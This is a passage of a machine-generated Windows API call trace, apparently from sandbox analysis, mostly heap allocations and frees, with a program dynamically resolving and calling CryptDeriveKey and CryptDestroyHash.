Flags=0x0, Size=0x8) returned 0x2e54ed8 [0186.643] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0186.643] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b30 [0186.643] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0186.643] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bc0 [0186.643] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0186.643] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bd8 [0186.643] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0186.643] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0186.643] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c08 [0186.643] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0186.643] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c20 [0186.643] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0186.643] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c68 [0186.643] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0186.643] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0186.643] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0186.643] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a10 [0186.643] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0186.643] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a58 [0186.643] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0186.643] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e78 [0186.644] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a28 [0186.644] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a58 | out: hHeap=0x970000) returned 1 [0186.644] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0186.644] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a28 | out: hHeap=0x970000) returned 1 [0186.644] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0186.644] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a28 [0186.644] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e78 [0186.644] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a58 [0186.644] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54de8 [0186.644] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0186.644] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a88 [0186.644] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a58 | out: hHeap=0x970000) returned 1 [0186.644] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0186.644] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a88 | out: hHeap=0x970000) returned 1 [0186.644] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0186.644] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d58 [0186.644] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a58 [0186.644] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0186.644] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e28 [0186.644] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a88 [0186.644] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a58 | out: hHeap=0x970000) returned 1 [0186.644] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0186.644] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a88 | out: hHeap=0x970000) returned 1 [0186.644] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0186.644] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0186.644] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ad0 [0186.644] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0186.644] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0186.644] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50aa0 [0186.644] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ad0 | out: hHeap=0x970000) returned 1 [0186.645] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0186.645] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50aa0 | out: hHeap=0x970000) returned 1 [0186.645] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0186.645] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ea8 [0186.645] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a58 [0186.645] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0186.645] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0186.645] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a88 [0186.645] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a58 | out: hHeap=0x970000) returned 1 [0186.645] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0186.645] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a88 | out: hHeap=0x970000) returned 1 [0186.645] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0186.645] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54418 [0186.645] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a28 | out: hHeap=0x970000) returned 1 [0186.645] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0186.645] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a28 [0186.645] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0186.645] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dd8 [0186.645] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a58 [0186.645] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a28 | out: hHeap=0x970000) returned 1 [0186.645] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0186.645] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a58 | out: hHeap=0x970000) returned 1 [0186.645] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0186.645] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a28 [0186.645] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0186.645] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0186.645] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xf) returned 0x2e50a58 [0186.645] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x2e50a58, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0186.645] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a58 | out: hHeap=0x970000) returned 1 [0186.646] GetProcAddress (hModule=0x756e0000, lpProcName="CryptDeriveKey") returned 0x75712c90 [0186.646] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a28 | out: hHeap=0x970000) returned 1 [0186.646] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0186.646] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69888 [0186.646] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0186.646] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0186.646] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dd8 [0186.646] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0186.646] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0186.646] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0186.646] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0186.646] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0186.646] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0186.646] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0186.646] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69888 | out: hHeap=0x970000) returned 1 [0186.646] CryptDeriveKey (in: hProv=0xa5f958, Algid=0x6601, hBaseData=0xa87390, dwFlags=0x1, phKey=0x8cef48 | out: phKey=0x8cef48*=0xa87290) returned 1 [0186.646] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0186.646] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b08 [0186.646] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0186.646] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a28 [0186.646] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a58 [0186.646] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a88 [0186.647] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a88 | out: hHeap=0x970000) returned 1 [0186.647] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0186.647] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a58 | out: hHeap=0x970000) returned 1 [0186.647] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50aa0 | out: hHeap=0x970000) returned 1 [0186.647] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0186.647] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a88 | out: hHeap=0x970000) returned 1 [0186.647] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ad0 | out: hHeap=0x970000) returned 1 [0186.647] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0186.647] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50aa0 | out: hHeap=0x970000) returned 1 [0186.647] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e00 | out: hHeap=0x970000) returned 1 [0186.647] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0186.647] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ad0 | out: hHeap=0x970000) returned 1 [0186.647] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cf8 | out: hHeap=0x970000) returned 1 [0186.647] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0186.647] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e78 | out: hHeap=0x970000) returned 1 [0186.647] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ed8 | out: hHeap=0x970000) returned 1 [0186.647] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0186.647] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f50 | out: hHeap=0x970000) returned 1 [0186.647] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0186.647] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0186.647] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0186.647] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0186.647] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0186.647] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54418 | out: hHeap=0x970000) returned 1 [0186.647] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a10 | out: hHeap=0x970000) returned 1 [0186.647] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0186.648] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ab8 | out: hHeap=0x970000) returned 1 [0186.648] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a40 | out: hHeap=0x970000) returned 1 [0186.648] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cb0 | out: hHeap=0x970000) returned 1 [0186.648] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ae8 | out: hHeap=0x970000) returned 1 [0186.648] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b60 | out: hHeap=0x970000) returned 1 [0186.648] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509e0 | out: hHeap=0x970000) returned 1 [0186.648] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c50 | out: hHeap=0x970000) returned 1 [0186.648] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b00 | out: hHeap=0x970000) returned 1 [0186.648] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b90 | out: hHeap=0x970000) returned 1 [0186.648] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509c8 | out: hHeap=0x970000) returned 1 [0186.648] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509f8 | out: hHeap=0x970000) returned 1 [0186.648] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ba8 | out: hHeap=0x970000) returned 1 [0186.648] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b18 | out: hHeap=0x970000) returned 1 [0186.648] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b78 | out: hHeap=0x970000) returned 1 [0186.648] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bc0 | out: hHeap=0x970000) returned 1 [0186.648] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b30 | out: hHeap=0x970000) returned 1 [0186.648] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bd8 | out: hHeap=0x970000) returned 1 [0186.648] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c20 | out: hHeap=0x970000) returned 1 [0186.648] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c08 | out: hHeap=0x970000) returned 1 [0186.648] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c68 | out: hHeap=0x970000) returned 1 [0186.648] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0186.648] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0186.648] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b48 | out: hHeap=0x970000) returned 1 [0186.648] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c80 | out: hHeap=0x970000) returned 1 [0186.648] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c98 | out: hHeap=0x970000) returned 1 [0186.649] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0186.649] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977a28 | out: hHeap=0x970000) returned 1 [0186.649] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0186.649] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c38 | out: hHeap=0x970000) returned 1 [0186.649] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a70 | out: hHeap=0x970000) returned 1 [0186.649] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bf0 | out: hHeap=0x970000) returned 1 [0186.649] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e698c8 | out: hHeap=0x970000) returned 1 [0186.649] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0186.649] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e558d8 | out: hHeap=0x970000) returned 1 [0186.649] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0186.649] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0186.649] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0186.649] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0186.649] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a28 | out: hHeap=0x970000) returned 1 [0186.649] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0186.649] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0186.649] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0186.649] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77b48 | out: hHeap=0x970000) returned 1 [0186.649] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0186.650] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0186.650] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507b8 | out: hHeap=0x970000) returned 1 [0186.650] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0186.650] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507e8 | out: hHeap=0x970000) returned 1 [0186.650] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0186.650] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0186.650] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0186.650] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0186.650] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0186.650] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0186.650] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0186.650] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0186.650] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77908 | out: hHeap=0x970000) returned 1 [0186.650] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0186.650] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0186.650] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0186.650] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0186.650] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508d8 | out: hHeap=0x970000) returned 1 [0186.650] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54260 | out: hHeap=0x970000) returned 1 [0186.650] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0186.650] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e801b0 | out: hHeap=0x970000) returned 1 [0186.650] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0186.650] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0186.650] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0186.650] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0186.650] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0186.651] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ae8 | out: hHeap=0x970000) returned 1 [0186.651] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0186.651] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0186.651] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0186.651] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0186.651] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c38 | out: hHeap=0x970000) returned 1 [0186.651] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0186.651] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0186.651] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b30 | out: hHeap=0x970000) returned 1 [0186.651] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0186.651] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b00 | out: hHeap=0x970000) returned 1 [0186.651] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0186.651] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509e0 | out: hHeap=0x970000) returned 1 [0186.651] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0186.651] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b48 | out: hHeap=0x970000) returned 1 [0186.651] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0186.651] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0186.651] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x2e69b28, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0186.651] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cb0 | out: hHeap=0x970000) returned 1 [0186.651] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b28 | out: hHeap=0x970000) returned 1 [0186.651] GetProcAddress (hModule=0x756e0000, lpProcName="CryptDestroyHash") returned 0x756ff0e0 [0186.651] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54260 | out: hHeap=0x970000) returned 1 [0186.652] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0186.652] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0186.652] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b48 | out: hHeap=0x970000) returned 1 [0186.652] CryptDestroyHash (hHash=0xa87390) returned 1 [0186.652] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0186.652] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0186.652] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ea8 [0186.652] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b30 [0186.652] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a40 [0186.652] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b48 [0186.652] 